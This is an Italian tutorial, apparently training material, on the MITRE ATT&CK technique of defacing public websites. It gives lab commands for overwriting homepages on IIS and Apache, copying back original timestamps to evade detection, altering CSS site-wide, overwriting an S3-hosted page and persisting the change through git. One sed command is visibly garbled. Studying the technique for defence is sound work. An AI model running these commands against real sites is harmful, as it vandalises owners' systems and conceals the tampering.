Deturpamento Web: External Defacement (T1491.002)
Il deturpamento di sistemi esterni rappresenta una tecnica d'impatto particolarmente visibile nell'arsenale degli attaccanti. Quando un avversario modifica l'aspetto di siti web pubblici o altri sistemi esposti, non sta semplicemente vandalizzando: sta orchestrando un'operazione psicologica mirata a danneggiare la reputazione e minare la fiducia degli utenti.
Questa tecnica si colloca nella tattica TA0040 (Impact), manifestandosi nella fase finale della kill chain quando l'obiettivo diventa la manipolazione della percezione pubblica. I siti web aziendali rappresentano il bersaglio preferito, trasformati in megafoni per messaggi politici o propaganda.
2 gruppi APT hanno utilizzato questa tecnica in campagne documentate. Sandworm Team ha deturpato circa 15.000 siti web georgiani nel 2019, mentre Ember Bear ha colpito multiple organizzazioni ucraine con operazioni simili.
L'accesso iniziale ai sistemi web avviene tipicamente attraverso tre vettori principali: web shell, credenziali compromesse o vulnerabilità delle applicazioni. In laboratorio, puoi simulare questi scenari partendo da una web shell già posizionata.
Su Windows con IIS, dopo aver ottenuto accesso tramite web shell: powershell -c "Get-Content C:\inetpub\wwwroot\index.html | Out-File C:\temp\backup.html"
Questo comando crea un backup del file originale prima della modifica. La sovrascrittura avviene poi con:
echo "Site Defaced
" > C:\inetpub\wwwroot\index.html
Per sistemi Linux con Apache, la sequenza diventa più articolata. Prima identifichi il percorso del web root: find / -name "index.html" 2>/dev/null | grep -E "(www|html|htdocs)"
Una volta individuato il target, procedi con la modifica preservando i timestamp originali per ridurre la detection:
touch -r /var/www/html/index.html /tmp/timestamp_ref
echo 'DEFACED
' > /var/www/html/index.html
touch -r /tmp/timestamp_ref /var/www/html/index.html
Gli attaccanti più sofisticati non si limitano alla homepage. Modificano file CSS per alterazioni sottili ma pervasive, oppure iniettano JavaScript per reindirizzamenti ritardati. Un esempio di modifica CSS globale: find /var/www/html -name ".css" -exec sed -i 's/background-color:#fff/background-color:#000/g' {} ;*
Per ambienti cloud come S3 bucket configurati per hosting statico, l'approccio richiede AWS CLI: aws s3 cp defaced.html s3://target-bucket/index.html --acl public-read
La persistenza del defacement spesso si ottiene modificando i processi di deployment. Su sistemi con Git deployment: cd /var/www/html && git add . && git commit -m "Update" && git push origin master
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo